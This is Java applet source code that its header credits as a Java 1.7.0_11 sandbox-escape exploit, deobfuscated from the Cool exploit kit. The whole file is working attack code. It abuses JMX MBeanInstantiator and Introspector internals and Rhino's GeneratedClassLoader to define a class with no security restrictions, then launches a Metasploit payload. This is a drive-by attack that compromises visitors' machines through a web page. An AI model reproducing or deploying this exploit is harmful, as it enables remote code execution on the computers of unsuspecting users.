/* * From Paunch with love (Java 1.7.0_11 Exploit) * * Deobfuscated from Cool EK by SecurityObscurity * * https://twitter.com/SecObscurity */ import java.applet.Applet; import com.sun.jmx.mbeanserver.Introspector; import com.sun.jmx.mbeanserver.JmxMBeanServer; import com.sun.jmx.mbeanserver.MBeanInstantiator; import java.lang.invoke.MethodHandle; import java.lang.invoke.MethodHandles.Lookup; import java.lang.invoke.MethodType; import java.lang.reflect.InvocationTargetException; import java.lang.reflect.Method; import javax.management.ReflectionException; import java.io.*; import metasploit.Payload; public class Exploit extends Applet { public void init() { try { int length; byte[] buffer = new byte[5000]; ByteArrayOutputStream os = new ByteArrayOutputStream(); // read in the class file from the jar InputStream is = getClass().getResourceAsStream("B.class"); // and write it out to the byte array stream while( ( length = is.read( buffer ) ) > 0 ) os.write( buffer, 0, length ); // convert it to a simple byte array buffer = os.toByteArray(); Class class1 = gimmeClass("sun.org.mozilla.javascript.internal.Context"); Method method = getMethod(class1, "enter", true); Object obj = method.invoke(null, new Object[0]); Method method1 = getMethod(class1, "createClassLoader", false); Object obj1 = method1.invoke(obj, new Object[1]); Class class2 = gimmeClass("sun.org.mozilla.javascript.internal.GeneratedClassLoader"); Method method2 = getMethod(class2, "defineClass", false); Class my_class = (Class)method2.invoke(obj1, new Object[] { null, buffer }); my_class.newInstance(); Payload.main(null); } catch (Throwable localThrowable){} } private Method getMethod(Class class1, String s, boolean flag) { try { Method[] amethod = (Method[])Introspector.elementFromComplex(class1, "declaredMethods"); Method[] amethod1 = amethod; for (int i = 0; i < amethod1.length; i++) { Method method = amethod1[i]; String s1 = method.getName(); Class[] aclass = method.getParameterTypes(); if ((s1 == s) && ((!flag) || (aclass.length == 0))) return method; } } catch (Exception localException) { } return null; } private Class gimmeClass(String s) throws ReflectionException, ReflectiveOperationException { Object obj = null; JmxMBeanServer jmxmbeanserver = (JmxMBeanServer)JmxMBeanServer.newMBeanServer("", null, null, true); MBeanInstantiator mbeaninstantiator = jmxmbeanserver.getMBeanInstantiator(); Class class1 = Class.forName("com.sun.jmx.mbeanserver.MBeanInstantiator"); Method method = class1.getMethod("findClass", new Class[] { String.class, ClassLoader.class }); return (Class)method.invoke(mbeaninstantiator, new Object[] { s, obj }); } }